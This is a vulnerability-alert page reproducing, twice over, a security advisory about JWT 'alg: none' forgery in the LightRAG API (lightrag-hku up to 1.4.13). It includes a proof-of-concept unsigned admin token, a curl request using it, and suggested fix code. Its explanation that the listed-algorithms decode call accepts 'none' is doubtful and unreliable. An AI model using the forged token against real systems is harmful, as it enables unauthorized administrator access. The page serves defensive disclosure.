Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
4.2
LightRAG JWT Algorithm Forgery Allows Unauthorized Access
GHSA-8ffj-4hx4-9pgf
CVE-2026-39413
Summary
The LightRAG API allows attackers to create fake login tokens, allowing them to access protected resources without a valid account. This is because the API doesn't properly check the type of token being used. To fix this, the API should explicitly specify which token algorithms are allowed and exclude the 'none' algorithm, which doesn't include any authentication checks.
What to do
- Update lightrag-hku to version 1.4.14.
Affected software
| Vendor | Product | Affected versions | Fix available |
|---|---|---|---|
| – | lightrag-hku | <= 1.4.13 | 1.4.14 |
Original title
lightrag-hku: JWT Algorithm Confusion Vulnerability
Original description
## Summary
The LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the `jwt.decode()` call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access.
## Details
In `lightrag/api/auth.py` at line 128, the `validate_token` method calls:
```python
payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])
```
This allows any algorithm listed in the token's header to be processed, including 'none'. The code does not explicitly specify that 'none' is not allowed, making it possible for an attacker to bypass authentication.
## PoC
An attacker can generate a JWT with the following structure:
```json
{
"header": {
"alg": "none",
"typ": "JWT"
},
"payload": {
"sub": "admin",
"exp": 1700000000,
"role": "admin"
}
}
```
Then send a request like:
```bash
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint
```
## Impact
An attacker can impersonate any user, including administrators, by forging a JWT with 'alg': 'none', gaining full access to protected resources without needing valid credentials.
## Recommended Fix
Explicitly specify allowed algorithms and exclude 'none'. Modify the `validate_token` method to:
```python
allowed_algorithms = [self.algorithm] if self.algorithm != 'none' else ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)
```
Or better yet, hardcode the expected algorithm(s):
```python
payload = jwt.decode(token, self.secret, algorithms=['HS256'])
```
The LightRAG API is vulnerable to a JWT algorithm confusion attack where an attacker can forge tokens by specifying 'alg': 'none' in the JWT header. Since the `jwt.decode()` call does not explicitly deny the 'none' algorithm, a crafted token without a signature will be accepted as valid, leading to unauthorized access.
## Details
In `lightrag/api/auth.py` at line 128, the `validate_token` method calls:
```python
payload = jwt.decode(token, self.secret, algorithms=[self.algorithm])
```
This allows any algorithm listed in the token's header to be processed, including 'none'. The code does not explicitly specify that 'none' is not allowed, making it possible for an attacker to bypass authentication.
## PoC
An attacker can generate a JWT with the following structure:
```json
{
"header": {
"alg": "none",
"typ": "JWT"
},
"payload": {
"sub": "admin",
"exp": 1700000000,
"role": "admin"
}
}
```
Then send a request like:
```bash
curl -H "Authorization: Bearer eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiJhZG1pbiIsImV4cCI6MTcwMDAwMDAwMCwicm9sZSI6ImFkbWluIn0." http://localhost:8000/api/protected-endpoint
```
## Impact
An attacker can impersonate any user, including administrators, by forging a JWT with 'alg': 'none', gaining full access to protected resources without needing valid credentials.
## Recommended Fix
Explicitly specify allowed algorithms and exclude 'none'. Modify the `validate_token` method to:
```python
allowed_algorithms = [self.algorithm] if self.algorithm != 'none' else ['HS256', 'HS384', 'HS512']
payload = jwt.decode(token, self.secret, algorithms=allowed_algorithms)
```
Or better yet, hardcode the expected algorithm(s):
```python
payload = jwt.decode(token, self.secret, algorithms=['HS256'])
```
ghsa CVSS3.1
4.2
Vulnerability type
CWE-347
Improper Verification of Cryptographic Signature
Published: 8 Apr 2026 · Updated: 8 Apr 2026 · First seen: 8 Apr 2026